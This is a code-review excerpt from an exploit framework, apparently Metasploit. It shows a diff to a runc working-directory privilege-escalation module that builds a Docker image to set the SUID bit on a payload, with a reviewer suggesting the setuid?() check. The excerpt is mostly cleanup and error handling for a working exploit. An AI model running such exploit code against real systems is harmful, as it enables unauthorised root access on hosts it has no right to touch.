modules/exploits/linux/local/runc_cwd_priv_esc.rb

```diff
@@ -124,18 +129,25 @@ def exploit
     register_file_for_cleanup("#{dir}/Dockerfile")
 
     print_status('Building from Dockerfile to set our payload permissions')
-    output = cmd_exec "cd #{dir} && docker build ."
+    output = cmd_exec("cd #{dir} && docker build .")
     output.each_line { |line| vprint_status line.chomp }
 
-    # delete our docker image
-    if output =~ /Successfully built ([a-z0-9]+)$/
+    # delete our docker image (second test created for docker v25.0.3)
+    if output =~ /Successfully built ([a-z0-9]+)$/ || output =~ /writing image sha256:([a-z0-9]+) done$/
       print_status("Removing created docker image #{Regexp.last_match(1)}")
-      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"
+      output = cmd_exec("docker image rm #{Regexp.last_match(1)}")
       output.each_line { |line| vprint_status line.chomp }
+    else
+      fail_with(Failure::NoAccess, "Failed to build docker container. The user may not have docker permissions")
     end
 
-    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"
-    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path
+    if output.include?("mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory")
+      fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.")
+    end
+
+    unless get_suid_files(payload_path).include?(payload_path)
```

Comment:
Can we use `setuid?()` here?

```suggestion
    unless setuid?(payload_path)
```

`get_suid_files()` is unnecessary for a file path (as opposed to directory path) and brittle compared to `setuid?`.

Reply:
I've tested this change and added it in. I also thought the original statement was a bit odd, but I'm too inexperienced to have known about `setuid?`.